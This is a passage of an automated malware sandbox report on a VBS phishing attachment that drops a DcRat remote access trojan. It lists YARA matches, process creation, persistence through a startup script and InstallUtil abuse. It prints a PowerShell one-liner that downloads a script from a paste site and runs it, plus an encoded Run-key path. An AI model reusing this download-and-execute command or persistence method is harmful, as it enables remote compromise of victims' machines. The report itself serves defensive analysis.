Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B94E0	14_2_016B94E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B9DB0	14_2_016B9DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016BDE60	14_2_016BDE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B71D8	14_2_016B71D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B9198	14_2_016B9198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016BFB08	14_2_016BFB08

Source: Re-RFQ - PN List.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Section loaded: security.dll

Jump to behavior

Source: Re-RFQ - PN List.vbs

ReversingLabs: Detection: 12%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220516

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@22/28@3/4

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
